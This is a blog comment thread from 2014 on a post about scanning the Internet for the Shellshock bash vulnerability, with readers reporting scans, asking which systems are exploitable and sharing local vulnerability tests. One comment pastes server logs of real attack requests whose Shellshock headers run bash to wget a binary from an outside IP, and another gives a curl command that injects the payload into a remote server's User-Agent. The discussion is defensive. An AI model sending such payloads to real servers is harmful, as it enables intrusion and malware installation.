Comments on Errata Security: Bash 'shellshock' scan of the Internet
(Blogger comment feed for the post, last updated 2024-01-16)

javin paul, 2014-10-01 09:21 -04:00:
Malware are really smart guys, they are now using something which looks more credible, :(

Javin (http://javarevisited.blogspot.com)

Anonymous, 2014-09-30 18:56 -04:00:
Do not do a playful thing!
Very annoying!

Anonymous, 2014-09-28 22:49 -04:00:
I was scanned by your scanner back on the 24th.

209.126.230.72 - - [24/Sep/2014:17:31:52 -0700] "GET / HTTP/1.0" 301 237 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"

At the time, I was using an old Debian Lenny web server. I replaced it with a wheezy based system yesterday. It hasn't been online for 24 hours yet and...

194.54.9.11 - - [28/Sep/2014:19:07:14 -0700] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 301 525 "-" "() { :;}; /bin/bash -c \"wget http://217.12.204.127/bin\""
194.54.9.11 - - [28/Sep/2014:19:07:34 -0700] "GET /var/www/html/admin.cgi HTTP/1.1" 301 543 "-" "() { :;}; /bin/bash -c \"wget http://217.12.204.127/bin\""
194.54.9.11 - - [28/Sep/2014:19:07:54 -0700] "GET /tmUnblock.cgi HTTP/1.1" 301 499 "-" "() { :;}; /bin/bash -c \"wget http://217.12.204.127/bin\""
194.54.9.11 - - [28/Sep/2014:19:08:14 -0700] "GET /var/www/cgi-bin/test-cgi HTTP/1.1" 301 521 "-" "() { :;}; /bin/bash -c \"wget http://217.12.204.127/bin\""
194.54.9.11 - - [28/Sep/2014:19:08:34 -0700] "GET /cgi-bin/hello HTTP/1.1" 301 499 "-" "() { :;}; /bin/bash -c \"wget http://217.12.204.127/bin\""
194.54.9.11 - - [28/Sep/2014:19:08:54 -0700] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 301 523 "-" "() { :;}; /bin/bash -c \"wget http://217.12.204.127/bin\""
194.54.9.11 - - [28/Sep/2014:19:09:14 -0700] "GET /cgi-mod/index.cgi HTTP/1.1" 301 507 "-" "() { :;}; /bin/bash -c \"wget http://217.12.204.127/bin\""
194.54.9.11 - - [28/Sep/2014:19:09:34 -0700] "GET /cgi-bin/test.cgi HTTP/1.1" 301 505 "-" "() { :;}; /bin/bash -c \"wget http://217.12.204.127/bin\""
194.54.9.11 - - [28/Sep/2014:19:09:54 -0700] "GET /cgi-bin-sdb/printenv HTTP/1.1" 301 513 "-" "() { :;}; /bin/bash -c \"wget http://217.12.204.127/bin\""

So thanks for the heads up!
I didn't have mod_cgi enabled but it's only a matter of time regardless.

Alexander, 2014-09-28 07:11 -04:00:
If it is not working with curl, it should be possible to create an HTTP request and send that with netcat. It will only work with CGI scripts unless another web API also communicates with environment vars and runs a shell script afterwards; mod_php and similar things like Tomcat will not do that. (I wonder why it happens with Akamai, though)

Anonymous, 2014-09-27 23:36 -04:00:
Well if you noticed, that is then able to exploit anything regardless of CGI existence. A random test of a local pool of Akamai servers sent me lots of ICMP replies.

So the question would be for curl folks, how to replicate this.

Very scary. Especially now since folks are realizing this is not just a remote access exploit. It can also be used with many setuid programs (like vmware) and such to gain root access.

10 out of 10 my ass. I call this a 20.

Alexander, 2014-09-27 18:47 -04:00:
@Ryan actually masscan does not use User-Agent; rather it puts the malicious string into the Host, Referer and Cookie headers. Not sure if that should make a difference.

Anonymous, 2014-09-27 16:50 -04:00:
Thx @Alexander for all the replies. I do understand that / is most likely not a CGI. But when I run masscan with the supplied config it finds hosts. I then picked one to test w/ curl and could not reproduce any of the same results.

What is masscan doing differently, besides that curl is passing -A (user-agent)?

Unknown, 2014-09-27 10:04 -04:00:
Thanks Sean, re hardy comment - you are correct.

Alexander, 2014-09-27 06:43 -04:00:
@all keep in mind that the user agent is completely arbitrary; anybody using the examples will use the URL from the blog post. We have seen the URL in scans on some machines, but that doesn't mean that it's really from the original script.

@Chrstfer unless you have an IPS, the easiest way is to add something at the top of each PHP page (or what you are using) and match the header vars against the exploit string and log that (will not help for actual CGI exploits since it may happen before the script gets called)

@zyphlar PHP is not directly exploitable since it doesn't set env vars and doesn't call bash; this is more likely a validation issue in your scripts

@tillo that is not correct, CGI by itself is not exploitable and mod_php does not even use CGI

@S whether it is illegal or not will not help you when your site goes down ...

@Mrityunjay Ranjan Bourne shell isn't (there is no Bourne shell on Linux or FreeBSD of course due to licensing); FreeBSD will usually have bash, but not as /bin/sh replacement

@jah richie Rails does not use CGI, so not directly; it may be due to other issues (unlikely)

@SojuMaster the issue is present e.g. in Cygwin, but unless you run a webserver, it's unlikely that it's exploitable

@shawn updating bash requires root; the exploit will run as the local user (e.g. wwwrun)

@Raoul Duke / might be a CGI script, but it usually isn't

@Ryan Pavely accessing the / path is not likely to hit a CGI

Anonymous, 2014-09-27 02:56 -04:00:
Very interesting. I can't get any tests to work with curl. I fired up a sample of your masscan and shiazm I can get hundreds of hosts to ping me. But I can't get a single one to report break when I test w/

curl -i -X HEAD "http://$$$.$$$.$$$.$$$/" -A '() { :;}; echo "Warning: Server Vulnerable"'

Any thoughts?

Anonymous, 2014-09-27 02:04 -04:00:
Hello,

I don't understand how this exploit works when just hitting the root path of the server. My understanding is it requires a CGI script that is written in or calls bash to be exploitable. Is this from broken HTTP servers?

Sean Holdsworth, 2014-09-26 20:41 -04:00:
Regarding comments about earlier versions of Debian and Ubuntu, the example given used /bin/sh rather than /bin/bash.

env X="() { :;} ; echo busted" /bin/sh -c "echo stuff"

Now try replacing /bin/sh with /bin/bash.

On those distributions you'll find that by default /bin/sh is a symbolic link to dash, another shell which does not have the problem. This is helpful for CGI scripts that use #!/bin/sh but you'll still need to patch bash.

For systems running older software distributions where a patch may not be available, the instructions at the following link on how to compile an updated and patched bash might be useful:

https://gist.github.com/mattwhite/86de50d30134129e44ef

SojuMaster, 2014-09-26 14:12 -04:00:
Does this exploit affect Windows boxes that have Bash installed? i.e. CA Spectrum in a Windows environment.

Thanks

Anonymous, 2014-09-26 12:12 -04:00:
I would guess that you're going to see a lot of vulnerable machines, since you started your scan the day the bug was announced. You scanned my servers about 12 hours before I patched them.

Richard, 2014-09-26 11:14 -04:00:
You scanned me at 2014-09-25 -5:41:55 UTC. Patch was not applied at that time but:
 * only a redirect at that web request you made
 * outbound network activity is blocked.

Patches applied now.

Jason Roysdon, 2014-09-26 10:46 -04:00:
Got scanned by your scanner, but we were already patched, so you never saw our response.

Anonymous, 2014-09-26 09:07 -04:00:
Be careful - you have your public IP available on the internet with potentially a listing of vulnerable Shellshock systems.

You might be the next target.

Shekhar Suman, 2014-09-26 06:20 -04:00:
One silly question:

How can I scan any remote server for the shellshock bug? Step by step guidance will be fine.

I need to do it for ethical purposes.

Unknown, 2014-09-26 05:22 -04:00:
I am running Ubuntu hardy, yeah I know it's old, but ...

bash --version
GNU bash, version 3.2.39(1)-release (i486-pc-linux-gnu)
Copyright (C) 2007 Free Software Foundation, Inc.
mwest@lenovo2:~$ env X="() { :;} ; echo busted" /bin/sh -c "echo stuff"
stuff

Interesting, so not all bash versions up to 4.3 are vulnerable it would seem.

abrahamdsl, 2014-09-26 02:13 -04:00:
I got scanned too! 25SEP2014 051051 and 071817 UTC +0800.

rocha, 2014-09-25 23:14 -04:00:
I tried to modify the code of masscan but it didn't compile well. Can you please post the code updated with functions to simulate this test (what you have done in the post)?